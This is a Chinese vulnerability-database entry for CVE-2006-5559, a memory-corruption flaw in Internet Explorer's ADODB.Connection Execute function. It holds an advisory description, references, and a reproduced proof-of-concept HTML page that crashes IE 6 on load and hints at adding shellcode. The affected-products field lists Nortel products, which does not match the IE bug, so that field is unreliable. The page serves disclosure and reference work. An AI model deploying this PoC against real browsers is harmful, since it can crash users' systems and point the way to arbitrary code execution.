Microsoft IE ADODB.Connection对象Execute函数内存破坏漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111380 漏洞类型 输入验证
发布时间 2006-10-24 更新时间 2007-03-26
CVE编号 CVE-2006-5559 CNNVD-ID CNNVD-200610-479
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/2629
https://www.securityfocus.com/bid/20704
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-479
|漏洞详情
InternetExplorer是微软发布的非常流行的WEB浏览器。IE中ADODB.ConnectionActiveX对象的Execute()函数存在内存破坏漏洞,远程攻击者可以通过诱骗用户访问恶意WEB页面或HTML文档导致浏览器崩溃或执行任意代码。Execute()函数允许恶意脚本以绕过脚本解释程序内存管理器的方式释放堆内存。Execute的第二个参数是一个变量,传送给了VariantClear,如果变量代表BSTR的话就会使用SysFreeString释放相关的字符串内存。脚本解释程序无法知道字符串内存已被释放,可能会在Execute调用返回后双重释放或重新使用内存。
|漏洞EXP
<!--
// Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC
// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed
// Author: YAG KOHHA (skyhole [at] gmail.com)
// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic

// Access violation at:
// ----------------------------------------------------
// 77114D0F   66:8B75 00       MOV SI,WORD PTR SS:[EBP]
// ----------------------------------------------------
// P.S. It`s will be fast with some shellcode :P
--!>

<html>
<head>
<title>ADODB.Connection.Execute CRASH TEST</title>
</head>
<script>
function Bang_Bang() {
var a = new ActiveXObject('ADODB.Connection.2.7');
var b = 'FUCK';
while (b.length <= 1024*256) b+=b;
for (var i = 0; i < 32768; i++)
try { a.Execute(b,b,b); } catch(e) {}
}
</script>
<body onLoad='Bang_Bang()'>
<center><h1>WOW!!! Are U live?</h1></center>
</body></html>

# milw0rm.com [2006-10-24]
|受影响的产品
Nortel Networks Symposium TAPI Service Provider Nortel Networks Symposium Network Control Center (NCC) Nortel Networks Symposium Agent Nortel Networks Contact Center Manager Server 0 N
|参考资料

来源:VU#589272
名称:VU#589272
链接:http://www.kb.cert.org/vuls/id/589272
来源:TA07-044A
名称:TA07-044A
链接:http://www.us-cert.gov/cas/techalerts/TA07-044A.html
来源:XF
名称:ie-adodbconnection-Code-Execution(29837)
链接:http://xforce.iss.net/xforce/xfdb/29837
来源:BID
名称:20704
链接:http://www.securityfocus.com/bid/20704
来源:SECTRACK
名称:1017127
链接:http://securitytracker.com/id?1017127
来源:MISC
链接:http://research.eeye.com/html/alerts/zeroday/20061027.html
来源:OSVDB
名称:31882
链接:http://www.osvdb.org/31882
来源:MILW0RM
名称:2629
链接:http://www.milw0rm.com/exploits/2629
来源:MS
名称:MS07-009
链接:http://www.microsoft.com/technet/security/Bulletin/MS07-009.mspx
来源:VUPEN
名称:ADV-2007-0578
链接:http://www.frsirt.com/english/advisories/2007/0578
来源:SECUNIA
名称:22452
链接:http://secunia.com/advisories/22452
来源:MILW0RM
名称:2629
链接:http://milw0rm.com/exploits/2629
来源:MISC
链接:http://blogs.technet.com/msrc/archive/2006/10/27/adodb-connection-poc-published.aspx
来源:oval:org.mitre.oval:def:214
名称:oval:org.mitre.oval:def:214
链接:http://oval.mitre